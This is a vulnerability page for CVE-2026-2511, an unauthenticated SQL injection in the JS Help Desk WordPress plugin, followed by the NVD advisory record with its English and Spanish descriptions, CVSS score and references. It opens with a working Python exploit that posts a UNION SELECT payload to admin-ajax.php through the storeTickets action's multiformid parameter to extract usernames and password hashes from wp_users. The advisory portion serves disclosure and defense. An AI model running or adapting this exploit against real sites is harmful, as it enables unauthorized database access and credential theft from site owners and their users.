CVE-2026-2511

import requests # Target URL (example) target_url = "http://example.com/wp-admin/admin-ajax.php" # Payload exploiting the lack of quotes in SQL query # Using integer-based injection to bypass esc_sql() payload = "1 UNION SELECT 1, user_login, user_pass FROM wp_users-- -" data = { "action": "storeTickets", # The vulnerable action/function "multiformid": payload # The vulnerable parameter } try: response = requests.post(target_url, data=data) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response:") print(response.text) else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-2511", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:10.017", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress is vulnerable to SQL Injection via the `multiformid` parameter in the `storeTickets()` function in all versions up to, and including, 3.0.4. This is due to the user-supplied `multiformid` value being passed to `esc_sql()` without enclosing the result in quotes in the SQL query, rendering the escaping ineffective against payloads that do not contain quote characters. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}, {"lang": "es", "value": "El plugin JS Help Desk – AI-Powered Support & Ticketing System para WordPress es vulnerable a inyección SQL a través del parámetro 'multiformid' en la función 'storeTickets()' en todas las versiones hasta e incluyendo la 3.0.4. Esto se debe a que el valor 'multiformid' proporcionado por el usuario se pasa a 'esc_sql()' sin encerrar el resultado entre comillas en la consulta SQL, lo que hace que el escape sea ineficaz contra cargas útiles que no contienen caracteres de comillas. Esto hace posible que atacantes no autenticados añadan consultas SQL adicionales a consultas ya existentes que pueden utilizarse para extraer información sensible de la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/js-support-ticket/tags/3.0.4/modules/fieldordering/model.php#L181", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/js-support-ticket/tags/3.0.4/modules/fieldordering/model.php#L996", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/js-support-ticket/tags/3.0.4/modules/ticket/model.php#L1178", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3463031/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2959c04a-70bd-4f5c-a61a-1eab2609f8ef?source=cve", "source": "[email protected]"}]}}